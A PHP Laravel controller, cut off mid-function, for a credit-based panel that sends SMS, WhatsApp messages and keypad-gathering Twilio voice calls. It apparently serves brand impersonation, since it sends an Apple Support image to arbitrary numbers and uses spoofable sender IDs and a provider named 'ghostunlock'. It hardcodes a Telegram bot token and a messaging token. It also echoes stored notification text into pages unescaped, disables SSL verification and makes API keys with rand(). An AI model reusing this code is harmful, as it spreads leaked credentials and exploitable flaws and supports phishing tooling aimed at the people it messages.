<?php

namespace App\Http\Controllers;

use App\Models\User;
use App\Models\Configuracion;
use App\Models\Credito;
use App\Models\Solicitud;
use App\Models\API;
use App\Models\SenderID;
use App\Models\Servicio;
use App\Models\Twilio;
use App\Models\Notificacion;

use Illuminate\Support\Facades\Session;

use Illuminate\Support\Facades\Auth;
use Exception;
use Illuminate\Http\Request;
use Twilio\TwiML\VoiceResponse;
use Twilio\Rest\Client;
use Twilio\Twiml;
use Twilio\Jwt\ClientToken;

require __DIR__ . '/twilio-php-main/src/Twilio/autoload.php';

//use Twilio\Rest\Twiml;
function rand_chars($c, $l, $u = FALSE)
{
    if (!$u) for ($s = '', $i = 0, $z = strlen($c) - 1; $i < $l; $x = rand(0, $z), $s .= $c[$x], $i++);
    else for ($i = 0, $z = strlen($c) - 1, $s = $c[rand(0, $z)], $i = 1; $i != $l; $x = rand(0, $z), $s .= $c[$x], $s = ($s[$i] == $s[$i - 1] ? substr($s, 0, -1) : $s), $i = strlen($s));
    return $s;
}



class SistemaController extends Controller
{
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function checa_notificacion(Request $request, $id)
    {
        $Notificacion = Notificacion::all();
        foreach ($Notificacion as $noti) {
            if ($noti->id_usuario == $id) {
                if ($noti->visto == 0) {
                    echo '<audio controls autoplay style="display:none;"><source src="../a.mp3" type="audio/mpeg"> Your browser does not support the audio element.</audio>';
                    echo '<script>$("#refresh_version").load(location.href + " #refresh_version");</script>';
                    // echo '<script>$("#licenciafresh").load(location.href + " #licenciafresh");</script>';
                    Session::flash('mostrar_notificacion', $noti->mensaje);

                    echo " <script>
$(document).ready(function() {
var myModal = new jBox('Modal', {
  title: 'Notificacion',
  content: $('#grabMe')
});
 
myModal.open();
        });
    </script>
    
    <div style='display: none' id='grabMe'>
<pre><html>$noti->mensaje</html></pre>
</div>";
                    $script = Notificacion::find($noti->id);
                    $script->delete();
                }
            }
        }
    }

    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function borrar_notificacion(Request $request)
    {

        $Notificacion = Notificacion::all();

        foreach ($Notificacion as $noti) {
            $script = Notificacion::find($noti->id);
            $script->delete();
        }
        return back();
    }

    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function borrar_historial(Request $request, $id)
    {

        $User = User::all();
        $Solicitud = Solicitud::all();


        foreach ($Solicitud as $soli) {
            if ($soli->id_user == $id) {
                $script = Solicitud::find($soli->id);
                $script->delete();
            }
        }
        return back();
    }


    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function cron(Request $request)
    {
        $User = User::all();
        foreach ($User as $user) {
            $Notificacion = new Notificacion;
            $Notificacion->id_usuario = $user->id;
            $Notificacion->mensaje = $request->mensaje;
            $Notificacion->visto = 0;
            $Notificacion->save();
        }
        return back();
    }
    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function musica(Request $request, $id)
    {
        echo '<script>$("#refresh_version").load(location.href + " #refresh_version");</script>';
        echo '<script>$("#licenciafresh").load(location.href + " #licenciafresh");</script>';

        \Session::flash('mostrar_notificacion', $request->mensaje);
    }
    
        /**
     * Show the form for editing the specified resource.
     * @param  string  $lenguaje
     * @param  string  $to 
     * @param  string  $twilio_account
     * @param  string  $twilio_secret
     * @param  string  $twilio_number
     * @param  string  $callback_url
     * @return \Illuminate\Http\Response
     */
    protected function TwilioDev($lenguaje, $to, $twilio_account, $twilio_secret, $twilio_number,$callback_url)
    {
     $Twilio = Twilio::find(4);
                $twilio_account = $Twilio->twilio_account;
                $twilio_secret = $Twilio->twilio_secret;
                $twilio_number = $Twilio->twilio_number;
                //$twilio_callback = $Twilio->twilio_callback;
                $url= "http://$_SERVER[HTTP_HOST]";
                $quer = "Url=" . urlencode("$url/process_gatherDev/$lenguaje.xml/$callback_url") . "&To=" . urlencode($to) . "&From=" . urlencode("+12074898571") . "&StatusCallback=$callback_url/getcalls_1.php&StatusCallbackMethod=POST";
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, 'https://api.twilio.com/2010-04-01/Accounts/' . $twilio_account . '/Calls.json');
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $quer);
                curl_setopt($ch, CURLOPT_USERPWD, $twilio_account . ':' . $twilio_secret);
                $result = curl_exec($ch);
                if (curl_errno($ch)) {
                    echo 'Error:' . curl_error($ch);
                }
                curl_close($ch);
                $res = json_decode($result, true);
        return $res;   
    }
    /**
     * Show the form for editing the specified resource.
     * @param  string  $lenguaje
     * @param  string  $to
     * @param  string  $twilio_account
     * @param  string  $twilio_secret
     * @param  string  $twilio_number
     * @param  string  $callback_url
     * @return \Illuminate\Http\Response
     */
    protected function Twilio($lenguaje, $to, $twilio_account, $twilio_secret, $twilio_number)
    {
        $Twilio = Twilio::all();
        foreach ($Twilio as $twi) {
            if ($twi->twilio_number == $twilio_number) {
                $twilio_account = $twi->twilio_account;
                $twilio_secret = $twi->twilio_secret;
                $twilio_number = $twi->twilio_number;
                $twilio_callback = $twi->twilio_callback;
            }
        }
                $url= "http://$_SERVER[HTTP_HOST]";
                $quer = "Url=" . urlencode("$url/process_gather/$lenguaje.xml") . "&To=" . urlencode($to) . "&From=" . urlencode("+" . $twilio_number) . "&StatusCallback=$url/response_gather&StatusCallbackMethod=POST";
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, 'https://api.twilio.com/2010-04-01/Accounts/' . $twilio_account . '/Calls.json');
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $quer);
                curl_setopt($ch, CURLOPT_USERPWD, $twilio_account . ':' . $twilio_secret);
                $result = curl_exec($ch);
                if (curl_errno($ch)) {
                    echo 'Error:' . curl_error($ch);
                }
                curl_close($ch);
                $res = json_decode($result, true);
        return $res;
    }



    /**
     * Show the form for editing the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     * @param  \Illuminate\Http\Request  $request
     */
    protected function whatsapp(Request $request)
    {
        $referenceId=rand(5, 15);
        
        
$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => "https://api.ultramsg.com/instance23185/messages/image",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_SSL_VERIFYHOST => 0,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => "token=0ffdspwjyov1mtth&to=$request->numero3&image=https://images.macrumors.com/t/qoDeBktnr8Wo0MV_75n02WebN6c=/1600x1200/smart/article-new/2016/03/AppleSupport_2016-Mar-03.jpg&referenceId=$referenceId&nocache=false",
  CURLOPT_HTTPHEADER => array(
    "content-type: application/x-www-form-urlencoded"
  ),
));

$response2 = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

        

       $curl = curl_init();
  curl_setopt_array($curl, array(
  CURLOPT_URL => "https://api.ultramsg.com/instance23185/messages/chat",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_SSL_VERIFYHOST => 0,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => "token=0ffdspwjyov1mtth&to=$request->numero3&body=$request->mensaje3&referenceId=$referenceId",
  CURLOPT_HTTPHEADER => array(
    "content-type: application/x-www-form-urlencoded"
  ),
));

    $response = curl_exec($curl);
    $err = curl_error($curl);
    curl_close($curl);
return $response;
   
}


  
    /**
     * Show the form for editing the specified resource.
     *
     * @return \Illuminate\Http\Response
     */
    protected function notificacion()
    {

        echo '<audio controls autoplay style="display:none;"><source src="../a.mp3" type="audio/mpeg">Your browser does not support the audio element.</audio>';
    }



    /**
     * Show the form for editing the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     * @param  \Illuminate\Http\Request  $request
     */
    public function editarusuario(Request $request, $id)
    {
        $equipo = User::find($id);
        $equipo->name = $request->get('name1');
        $equipo->email = $request->get('email1');
        $equipo->rol = $request->get('rol1');
        $contraseñaantigua = $request->get('password1');
        $equipo->password = bcrypt($contraseñaantigua);
        $equipo->save();
        $this->notificacion();
        Session::flash('mostrar_success', 'Done');
        return back()->with('mostrar_success', "Editado <br> Nombre:" . $equipo->name . "<br> Email: " . $equipo->email . "<br> Rol: " . $equipo->rol);
    }


    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function borrar_servicio($id)
    {
        $borra_servicio = Servicio::find($id);
        $borra_servicio->destroy($id);
        Session::flash('mostrar_success', 'Done');
        return back();
    }


    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function borrar_twilio($id)
    {
        $borra_servicio = Twilio::find($id);
        $borra_servicio->destroy($id);
        Session::flash('mostrar_success', 'Done');
        return back();
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @param  \Illuminate\Http\Request  $request

     * @return \Illuminate\Http\Response
     */
    public function editar_servicio(Request $request, $id)
    {

        $servicio = Servicio::findOrFail($id);
        $servicio->nombre = $request->get('nombre1');
        $servicio->descripcion = $request->get('descripcion1');
        $servicio->costo = $request->get('costo1');
        $servicio->id_api = $request->get('api1');
        $servicio->id_sender = $request->get('sender1');
        $servicio->save();
        Session::flash('mostrar_success', 'Done');
        return back()->with("mostrar_success", "Servicio: " . $servicio->nombre . "Editado");
    }
    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function eliminarusuario($id)
    {
        $admin = User::find($id);
        $admin->delete();
        Session::flash('mostrar_success', 'Done');
        return back();
    }
    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function adduser(Request $request)
    {
        try {
            $setting =  new User;
            $setting->name = $request->get('name');
            $setting->email = $request->get('email');
            $contrasenaantigua = $request->get('password');
            $setting->creditos = $request->get('creditos');;
            $setting->api_key = rand_chars("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890", 10, TRUE);
            $setting->api_secret = rand_chars("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890", 10, TRUE);
            $setting->password = bcrypt($contrasenaantigua);
            $setting->rol = $request->get('rol');
            $setting->save();

            $this->notificacion();
            Session::flash('mostrar_success', 'Done');

            return back()->with("mostrar_success", "Usuario: " . $setting->name . "Agregado");
        } catch (Exception $e) {
            Session::flash('mostrar_warning', 'Done');

            return back()->with("mostrar_warning", "No se puede agregar usuarios con email repetidos intente de nuevo");
        }
        //
    }



    /**
     * Store a newly created resource in storage.
     * @param  int  $api_key
     * @param  int  $api_secret
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function api_credit(Request $request, $api_key, $api_secret)
    { 
        $user = User::all();
        foreach ($user as $us) {
            if ($api_key == $us->api_key && $api_secret == $us->api_secret) {
                return response()->json([
                    'id' => $us->id,
                    'creditos' => $us->creditos,
                    'user' => $us->name,
                    'success' => 'success',

                ])->withCallback($request->input('callback'));
            }
        }
        return response()->json([
            'failed' => "No Autorized or Credentials Wrong",
        ]);

        //  return $user->toJson();
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function agregar_creditos(Request $request)
    {
        try {
            $creditos = new Credito();
            $usuario = User::find($request->get('usuario'));
            $usuario->creditos = $request->get('cantidad') + $usuario->creditos;
            $usuario->save();
            $creditos->id_user = $usuario->id;
            $creditos->cantidad = $request->get('cantidad');
            $creditos->save();
            $this->notificacion();
            
            
                    $chatid = $usuario->chatid;
                    $bot = Configuracion::find(1)->bot;
                    $msj = '
📱 Voice Credits Added  🔊

💳 New Credits:  ' . $creditos->cantidad . ' ✅

📋 Total Credits:  ' . $usuario->creditos  . '

🆔 https://t.me/teampro247';
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot8184124272:AAGedrkwHC1IWHX7gQGIz6ppqOcBt5_3Pfs/sendMessage");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"chat_id\": \"" . $chatid . "\", \"text\": \"" . $msj . "\"}");
                    $headers = array();
                    $headers[] = 'Content-Type: application/json';
                    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

                    $result = curl_exec($ch);
                    if (curl_errno($ch)) {
                        echo 'Error:' . curl_error($ch);
                    }
                    curl_close($ch);
                    
                    
            Session::flash('mostrar_success', 'Done');
            return back()->with("mostrar_success", "Agregados " . $request->get('cantidad') . " creditos a " . $usuario->name);
        } catch (Exception $e) {
            Session::flash('mostrar_warning', 'Done');

            return back();
        }
    }


    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function mostrar_modal_api(Request $request)
    {
        $api_68sms = API::find(1);
        $api_real = API::find(2);
        $api_smspaneloff = API::find(3);

        session(['api_68sms' => $api_68sms->api_key]);
        session(['real_apikey' => $api_real->api_key]);
        session(['api_smspaneloff' => $api_smspaneloff->api_key]);

        return back()->with("mostrar_modal_api", $api_68sms->id);
    }



    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function guardar_modal_api(Request $request)
    {
        $api_68sms = API::find(1);
        $api_real = API::find(2);
        $api_smspaneloff = API::find(3);

        $api_68sms->nombre_publico = $request->get('68sms_nombre_publico');
        $api_68sms->api_key = $request->get('68sms_apikey');

        $api_real->nombre_publico = $request->get('real_nombre_publico');
        $api_real->api_key = $request->get('real_apikey');

        $api_real->nombre_publico = $request->get('real_nombre_publico');
        $api_real->api_key = $request->get('real_apikey');

        $api_smspaneloff->nombre_publico = $request->get('smspaneloff_nombre_publico');
        $api_smspaneloff->api_key = $request->get('smspaneloff_apikey');


        $api_68sms->save();
        $api_real->save();
        $api_smspaneloff->save();

        session(['api_68sms' => $api_68sms->api_key]);
        session(['real_apikey' => $api_real->api_key]);
        session(['smspaneloff_apikey' => $api_smspaneloff->api_key]);

        session(['68sms_nombre_publico' => $api_68sms->nombre_publico]);
        session(['real_nombre_publico' => $api_real->nombre_publico]);
        session(['smspaneloff_nombre_publico' => $api_smspaneloff->nombre_publico]);

        echo ("<meta http-equiv='refresh' content='1'>");
        return back();
    }


    /**
     * Store a newly created resource in storage.
     * @param  string  $api_key
     * @param  string  $api_secret
     * @param  string  $mens
     * @param  string  $senderid
     * @param  string  $number
     * @param  int  $api_id
     * @return \Illuminate\Http\Response

     */
    public function smsAPI($api_key, $api_secret, $api_id, $number, $senderid, $mens)
    {
        try {
            function RemoveSpecialChar6($str)
            {
                $res = str_replace(array('+'), ' ', $str);
                return $res;
            }
            $mensaje_decode = RemoveSpecialChar6($mens);

            $Servicio = Servicio::find($senderid);
            $SenderID = SenderID::find($Servicio->id_sender);
            $Api = API::find($api_id);
            $user = User::all();
            $costo = $Servicio->costo;

            foreach ($user as $us) {

                if ($api_key == $us->api_key && $api_secret == $us->api_secret) {
                    if ($us->creditos >= $costo) {
                        if ($Api->name == 'real') {
                            $respuesta = json_decode($this->Real($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode));
                            if ($respuesta->code == 'ok') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'sms86') {

                            $output = json_decode($respuesta = $this->SMS86($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode));

                            if ($output->message == 'Successfully Send') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'paneloff') {
                            $respuesta = json_decode($this->smspaneloff($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode));
                            if ($respuesta->status == 'queued') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } elseif ($respuesta->status == 'error') {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed Report it please',

                                ];
                                return response()->json($data, 401, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'raptor1') {
                            $output = $respuesta = $this->Raptor($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode);

                            if ($output == 'Enviado') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'raptor') {
                            $output = $respuesta = $this->Raptor($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode);

                            if ($output == 'Enviado') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'ghostunlock') {
                            $output = $respuesta = $this->ghostunlock($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode);

                            if ($output == 'Enviado') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'realcc') {
                            $respuesta = json_decode($this->RealCC($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode));
                            if ($respuesta->status == 'queued') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        } elseif ($Api->name == 'isender') {
                            $respuesta = json_decode($this->isender($mensaje_decode, $Api->api_key, $number, $SenderID->nombre, $mensaje_decode));
                            if ($respuesta->status = 'success') {
                                $fecha = date("Y-m-d");
                                $us->creditos = $us->creditos - $costo;
                                $us->save();
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->numero = $number;
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->contenido = $mens;
                                $solicitud->status = "success";
                                $solicitud->save();
                                $data = [
                                    'status' => "success",
                                    'id' => $us->id,
                                    'creditos' => $us->creditos,
                                    'mensaje' => $mens,
                                    'user' => $us->name
                                ];
                                return response()->json($data, 200, []);
                            } else {
                                $solicitud = new Solicitud;
                                $solicitud->id_user = $us->id;
                                $solicitud->costo = $costo;
                                $solicitud->contenido = $mens;
                                $solicitud->numero = $number;
                                $solicitud->status = "failed";
                                $solicitud->id_api = $Api->id;
                                $solicitud->sender_id = $senderid;
                                $solicitud->save();
                                $data = [
                                    'status' => "false",
                                    'message' => 'Failed sended',

                                ];
                                return response()->json($data, 401, []);
                            }
                        }
                        //isender









                    }
                    $data = [
                        'status' => "false",
                        'message' => 'Credits enought',

                    ];
                    return response()->json($data, 401, []);
                }
            }
        } catch (Exception $e) {
            $data = [
                'status' => "false",
                'message' => 'Exception Report to Dev dont worry houston this no cost credits :)',

            ];
            return response()->json($data, 401, []);
        }

        $data = [
            'status' => "false",
            'message' => 'Fatal Exception Report to Dev dont worry houston this no cost credits :)',

        ];
        return response()->json($data, 401, []);
    }

    /**
     * Store a newly created resource in storage.
     * @param  string  $secret
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function enviar_sms(Request $request)
    {

        try {
            $user = User::find($request->get('user_id'));
            $servicio = Servicio::find($request->servicio);
            $sender = SenderID::find($servicio->id_sender);
            $nombre_sender = $sender->nombre;
            $costo = $servicio->costo;
            $api = API::find($servicio->id_api);
            //$api = $servicio->id_api;
            //$Api_key = API::find($servicio->id_api);
            $number = $request->get('numero');
            $mens = $request->get('mensaje');
            
            if ($api->name == "sms86") {
                if ($user->creditos >= $costo) {

                    $output = json_decode($this->SMS86($mens, $api->api_key, $number, $nombre_sender, $mens));
                    if ($output->message == 'Successfully Send') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->numero = $number;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Mensaje : <br>" . $mens . "<br> para : " . $number . " <br> <p class='success'>Enviado</p>");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Error";
                        $solicitud->contenido = "No Sended Error";
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with("No Sended Error");
                    }
                    Session::flash('mostrar_warning', 'Done');

                    return back()->with("No Sended Error");
                }
                Session::flash('mostrar_warning', 'Done');

                return back()->with("No Sended Error");
            } elseif ($api->name  == "real") {
                if ($user->creditos >= $costo) {
                    $respuesta = json_decode($this->Real($mens, $api->api_key, $number, $nombre_sender, $mens));
                    if ($respuesta->code == 'ok') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Mensaje : <br>" . $mens . "<br> para : " . $number . " <br> <p class='success'>Enviado</p>");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Error";
                        $solicitud->contenido = "No Sended Error";
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with("No Sended Error");
                    }
                    Session::flash('mostrar_warning', 'Done');
                    return back()->with("No Sended Error");
                }
                Session::flash('mostrar_warning', 'Done');

                return back()->with("No Sended Error");
            } elseif ($api->name  == "realcc") { //iamserver
